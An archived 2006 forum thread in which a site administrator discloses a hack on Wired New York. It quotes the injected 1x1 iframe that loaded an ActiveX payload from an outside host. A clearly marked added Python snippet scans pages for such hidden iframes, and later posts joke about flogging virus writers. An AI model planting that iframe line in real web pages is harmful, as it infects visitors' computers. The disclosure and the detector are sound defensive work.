Important Security Issue - Hacking Attack



Edward
December 8th, 2006, 12:42 PM
I have discovered this morning that there was a hacking attack on Wired New York.

It seems that the attack occurred on 11/22/06 at 8:36 am.

As a result, the following code was added to all html pages (but not forum pages):
<iframe src="http://constellations.ws/counter.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>
Apparently the code tries to load an ActiveX control in Internet Explorer. Users of Firefox are not affected by this issue.

Firefox does not run ActiveX controls, Internet Explorer version 7 requests your permission to run the ActiveX control, and IE6 - I am not sure, probably depends on your security settings. If you allow the ActiveX control to run, your computer might be infected by a virus (that is, if you do not have anti-virus software installed).

I am currently in touch with the server host and vBulletin support, trying to understand how the attack happened and what is the appropriate response.

As of this moment, Wired New York pages still contain the malicious code. The forum pages are not affected. If you view Wired New York pages, either use Firefox, or if you are using IE make sure your security settings do not allow the ActiveX control to run automatically.

I will issue updates about any new developments in this situation.

lofter1
December 8th, 2006, 12:52 PM
I had noticed this ^^^ at the top of the page when clicking into the forum ...

Never activated it ... hope it will be gone before too long.

Ninjahedge
December 8th, 2006, 01:49 PM
Had me worried for a bit, but I am a forum-er not a page-er...


Hope you are able to trace this and how it got on the site!!!!

BrooklynRider
December 8th, 2006, 03:46 PM
Can someone explain what the threat is and what impact it has on our computers?

Also, can someone more educated than I in IE tell me what the custom IE Security setting should be for Active X if this is a threat?

Edward
December 8th, 2006, 04:24 PM
I think with default settings for IE it will prompt you to install the ActiveX control when you visit a Wired New York page. If you decline (as you should in all cases when you do not know the purpose) then you will be fine. If you agree, the control will try to infect your computer with some sort of virus (which might be prevented by your anti-virus program).

lofter1
December 8th, 2006, 06:52 PM
Another question on this topic from a dense non-techie ...

Other sites sometimes show that same "Click here to activate the ActiveX Control" bar message.

Is that a sign of a hack? And is it always wise NOT to click that?

Edward
December 8th, 2006, 07:18 PM
It is not necessarily a sign of a hack, there are legitimate applications, however, it is always wise not to click if you do not know the purpose. If a site explains to you why this is needed and you indeed need it and you trust the site, then you can install it.

macreator
December 9th, 2006, 08:12 PM
Thanks for the notice, Edward. I'll be sure to make sure IE on my PC doesn't automatically run ActiveX. Luckily I mainly use my Mac to access the site.

Fabrizio
December 10th, 2006, 09:36 AM
So I imagine this has no effect at all on Mac computers. True?

bmc
December 10th, 2006, 01:01 PM
So I imagine this has no effect at all on Mac computers. True?

That's correct, Fabrizio. This has no effect on Macintosh systems at all. :)

Edward
December 12th, 2006, 09:37 PM
I cleaned the site the same day, 8 Dec 06, but it's still worth reminding not to allow installation of ActiveX when you are not sure of the purpose, and also please report to me any unusual behaviour.
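
Added example, not part of the original thread and not the procedure Edward used: one way to check that static pages are clean after an injection like the one quoted in the first post is to parse every HTML file and flag iframes that are invisible (0 or 1 pixel) or load from another host. The function names, the "tiny"/"off-site" heuristics and the use of wirednewyork.com as the site host are assumptions made for this sketch; the sample page is constructed.

```python
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample page; its second iframe is the line quoted in the first post.
SAMPLE = """<html><body><h1>Guide</h1>
<iframe src="/maps/embed.html" width=400 height=300></iframe>
<iframe src="http://constellations.ws/counter.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>
</body></html>"""


class IframeAudit(HTMLParser):
    """Collect iframes that are invisible (0/1 px) or load from another host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        reasons = []
        dims = [a.get(d, "").lower().replace("px", "") for d in ("width", "height")]
        if any(d in ("0", "1") for d in dims):
            reasons.append("tiny")  # the visitor never sees the frame
        host = urlparse(a.get("src", "")).hostname or ""
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site")  # content served by a different host
        if reasons:
            self.findings.append((a.get("src", ""), reasons))


def find_suspicious_iframes(html, site_host):
    audit = IframeAudit(site_host)
    audit.feed(html)
    audit.close()
    return audit.findings


def scan_tree(root, site_host):
    """Return {path: findings} for every .htm/.html file under root."""
    hits = {}
    for path in Path(root).rglob("*.htm*"):
        if path.is_file():
            found = find_suspicious_iframes(path.read_text(errors="replace"), site_host)
            if found:
                hits[str(path)] = found
    return hits
```

Running scan_tree over the document root before and after cleanup gives a list of pages still carrying the frame; an off-site hit on its own may be a legitimate embed and needs a manual look.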

antinimby
December 13th, 2006, 01:24 AM
Damn hackers.

lofter1
December 13th, 2006, 11:49 AM
Since you "cleaned" it I've run into no problems -- but was experiencing some aggravating freezes / slow loading between 11/22 <> 12/8 (so I probably stupidly clicked something I shouldn't have during that time and gummed myself up).

kz1000ps
December 13th, 2006, 12:09 PM
I hate to whine about something relatively trivial like this, but has anyone else noticed the site has been slow in recent days? Alexa shows that traffic has been about as slow as it's gotten this year, so it can't be that.

american dream
December 20th, 2006, 10:32 AM
Thanks for noticing us, I'll take care ..

Bob
December 30th, 2006, 08:13 AM
These people who create and post internet viruses need to be shot. Publicly.

ZippyTheChimp
December 30th, 2006, 03:47 PM
A little too severe.

Since many, when caught, express surprise that they are treated as criminals, and to satisfy my own urge to just slap them around while telling them what idiots they are - I propose:

Stocks (http://en.wikipedia.org/wiki/Stocks) and Pillories (http://en.wikipedia.org/wiki/Pillory)

lofter1
December 30th, 2006, 07:40 PM
Agreed ^^^

Fear of public humiliation while still alive would most likely be a far greater deterrent than any threat of death, which for many is just too abstract.

ablarc
December 31st, 2006, 01:53 PM
I propose:

Stocks (http://en.wikipedia.org/wiki/Stocks) and Pillories (http://en.wikipedia.org/wiki/Pillory)
I agree, and would add: flogging (at the option of the convicted party). Many would choose it over years or even months stewing in jail. If it's chosen, it's not inhumane.

ZippyTheChimp
December 31st, 2006, 04:01 PM
We'd have to choose a good public square. (http://www.wirednewyork.com/forum/showthread.php?t=10703&page=3&highlight=square)

lofter1
December 31st, 2006, 04:17 PM
Perhaps we should choose Coentes Slip, where in October 1691 (http://home.eznet.net/~dminor/NYNY1690.html) :

Surveyors begin laying out streets and lots. The council votes a four shilling per week allowance to Top-Knot Betty, another woman and two children, as charity cases. It also votes for the construction of a ducking stool (http://www.getchwood.com/punishments/curious/chapter-2.html) to be built on Coentes Slip, in front of the towne-house.

http://content.answers.com/main/content/wp/en/thumb/4/46/300px-Cucking_stool.png

ablarc
December 31st, 2006, 05:59 PM
We'd have to choose a good public square. (http://www.wirednewyork.com/forum/showthread.php?t=10703&page=3&highlight=square)
Floggings in Bryant Park?



Right after the fashion shows.

Ninjahedge
January 22nd, 2007, 11:47 AM
DURING the fashion shows...

They need to drum up some more attention to this little-known and underutilized profession!

ZippyTheChimp
January 22nd, 2007, 12:52 PM
Floggings in Bryant Park?

Right after the fashion shows.



DURING the fashion shows...

It could be worked out.
http://dts.ystoretools.com/1150/images/250x1000/doco.jpg

kz1000ps
January 22nd, 2007, 02:07 PM
But if she's the flogger, then imagine how many pent-up nerds are going to start writing viruses just to get a little action. It'd be pAnDEmoNiuM!

ZippyTheChimp
January 22nd, 2007, 03:42 PM
Setting up a code of law isn't as easy as I thought.

Ninjahedge
January 22nd, 2007, 03:57 PM
Setting up a code of law isn't as easy as I thought.

Coda what?

http://ledzeppelin.alexreisner.com/graphics/covers/coda.jpg

ablarc
January 24th, 2007, 09:27 PM
^ LOL! To think, I almost missed this!

ZippyTheChimp
January 24th, 2007, 10:46 PM
We've completely trashed Edward's thread.

OmegaNYC
January 27th, 2007, 02:13 PM
^ He won't be mad at us? Would he? :(